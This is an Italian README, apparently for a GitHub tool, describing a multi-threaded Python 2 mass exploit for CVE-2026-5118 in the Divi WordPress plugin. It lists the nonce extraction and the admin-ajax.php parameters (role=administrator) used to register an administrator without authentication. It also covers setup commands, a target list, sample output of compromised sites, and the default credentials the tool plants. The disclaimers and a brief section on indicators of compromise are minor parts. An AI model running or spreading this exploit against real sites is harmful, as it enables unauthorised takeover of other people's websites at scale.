
CVE-2026-5118 – Exploit di massa in Python2 per il plugin WordPress Divi: registrazione di amministratore non autenticata tramite admin-ajax.php. Scanner multi-thread con estrazione del nonce.
⚠️ AVVERTENZA: Questo strumento è destinato esclusivamente a test di penetrazione autorizzati e ricerca sulla sicurezza.
L'accesso non autorizzato a sistemi informatici è illegale. Utilizzalo solo su sistemi di tua proprietà o per i quali hai ricevuto esplicito permesso scritto. Per ulteriori informazioni, consulta il disclaimer sulla copertina di Jenderal92. Puoi verificarlo QUI !!!
Questo script Python 2 sfrutta una vulnerabilità di escalation dei privilegi nel plugin WordPress Divi (e nei relativi moduli Divi). Consente la registrazione remota di un account amministratore tramite:
fb_nonce dal modulo di registrazione Divi del target./wp-admin/admin-ajax.php con role=administrator.https:// se mancante.de_fb_obj).success, user_id, user created, ecc.).results.txt nel formato:https://target.com/wp-admin/ | username | passwordurllib2, Queue, threading – non compatibile con Python 3 senza modifiche)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
Crea un file di testo con un dominio o URL per riga. Puoi omettere http:// / https:// – lo script aggiungerà https:// di default.
Esempio targets.txt:
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] Total targets : 4
[*] Credentials : Attacker / Attacker@123#+
[*] Threads : 20
[*] Output file : results.txt
[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/
[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/
[3] Checking http://192.168.1.100/wordpress
[3] FAILED http://192.168.1.100/wordpress
[4] Checking https://test-site.org
[4] FAILED https://test-site.org
=== DONE ===
Successful: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
Puoi personalizzare le seguenti variabili all'inizio dello script:
https:// se non è fornito uno schema.fb_nonce tramite pattern regex.multipart/form-data contenente:
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<nonce estratto>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_emailPer gli amministratori WordPress che utilizzano Divi:
admin-ajax.php.role manipolabile.Indicatori di compromissione (IoC):
admin-ajax.php con action=de_fb_ajax_submit_ajax_handlerAttacker)role=administrator nei log di accessoQuesto software è fornito a scopo didattico e esclusivamente per test di sicurezza autorizzati. L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo strumento. Utilizzando questo software, accetti di:
La violazione di questi termini può comportare azioni penali, multe o reclusione.
Sono benvenute pull request per miglioramenti (porting a Python 3, migliore estrazione del nonce, rilevamento di percorsi di registrazione aggiuntivi). Si prega di mantenere il disclaimer etico.
| Variabile | Default | Descrizione |
|---|
DEFAULT_USERNAME | Attacker | Nome utente da registrare |
DEFAULT_PASSWORD | Attacker@123#+ | Password (complessa con caratteri speciali) |
DEFAULT_EMAIL | [email protected] | Indirizzo email |
THREAD_COUNT | 20 | Numero di thread concorrenti |
OUTPUT_FILE | results.txt | File in cui salvare i target compromessi |